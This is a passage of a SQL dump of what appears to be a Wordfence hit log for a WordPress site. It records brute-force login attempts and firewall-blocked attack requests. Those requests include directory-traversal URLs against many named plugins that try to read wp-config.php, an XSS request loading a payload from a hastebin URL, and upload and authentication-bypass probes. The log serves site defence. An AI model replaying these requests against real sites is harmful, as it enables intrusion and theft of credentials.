Firefox/62.0','loginFailValidUsername',NULL,NULL),(6653,0.000000,1629490855.399963,'\0\0\0\0\0\0\0\0\0\0��1�m�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6654,0.000000,1629491526.186289,'\0\0\0\0\0\0\0\0\0\0���@w�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6655,0.000000,1629492243.530113,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6656,0.000000,1629492680.406420,'\0\0\0\0\0\0\0\0\0\0���(%�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(6657,0.000000,1629492977.040450,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6658,0.000000,1629493265.544564,'\0\0\0\0\0\0\0\0\0\0���;u�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(6659,0.000000,1629493270.714701,'\0\0\0\0\0\0\0\0\0\0���;u�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(6660,0.000000,1629493272.754947,'\0\0\0\0\0\0\0\0\0\0���;u�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(6661,0.000000,1629493700.098531,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6662,0.000000,1629494295.058982,'\0\0\0\0\0\0\0\0\0\0��gm',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','loginFailValidUsername',NULL,NULL),(6663,0.000000,1629494495.007610,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6664,0.000000,1629494518.335787,'\0\0\0\0\0\0\0\0\0\0��4ʎ�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(6665,0.000000,1629494523.820113,'\0\0\0\0\0\0\0\0\0\0��4ʎ�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(6666,0.000000,1629494529.311761,'\0\0\0\0\0\0\0\0\0\0��4ʎ�',0,200,0,1,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(6667,0.000000,1629495234.207580,'\0\0\0\0\0\0\0\0\0\0���@rP',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6668,0.000000,1629495920.762221,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6669,0.000000,1629496055.400582,'\0\0\0\0\0\0\0\0\0\0���`J',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6670,0.000000,1629496271.878161,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6671,0.000000,1629496282.963910,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6672,0.000000,1629496854.380303,'\0\0\0\0\0\0\0\0\0\0���@w�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6673,0.000000,1629497519.556845,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6674,0.000000,1629497703.348112,'\0\0\0\0\0\0\0\0\0\0��3�e2',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6675,0.000000,1629498537.414829,'\0\0\0\0\0\0\0\0\0\0��h���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6676,1629498991.933401,1629498991.628800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(6677,1629499002.448976,1629499002.145400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(6678,1629499023.803193,1629499023.540000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6679,1629499023.162406,1629499022.854800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6680,1629499022.386750,1629499022.084900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6681,1629499021.663134,1629499021.395900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6682,1629499020.982276,1629499020.705800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6683,1629499020.341019,1629499020.044700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6684,1629499019.555360,1629499019.290400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6685,1629499018.831612,1629499018.519300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6686,1629499018.387636,1629499017.880300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6687,1629499017.417787,1629499017.150600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6688,1629499017.032401,1629499016.746100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6689,1629499016.069791,1629499015.752700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6690,1629499015.332307,1629499015.026600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6691,1629499014.595136,1629499014.330200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6692,1629499013.809747,1629499013.541000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6693,1629499013.117324,1629499012.845900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6694,1629499012.549944,1629499012.257500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(6695,1629499011.305651,1629499010.965500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6696,1629499010.203122,1629499009.940200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(6697,1629499008.873992,1629499008.585900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6698,1629499008.154461,1629499007.856000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6699,1629499007.433294,1629499007.145200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6700,1629499006.626078,1629499006.338900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6701,1629499006.091255,1629499005.765600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6702,1629499056.806987,1629499056.535400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://www.equalitywalk.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(6703,0.000000,1629499132.701253,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6704,0.000000,1629499382.606381,'\0\0\0\0\0\0\0\0\0\0��ψ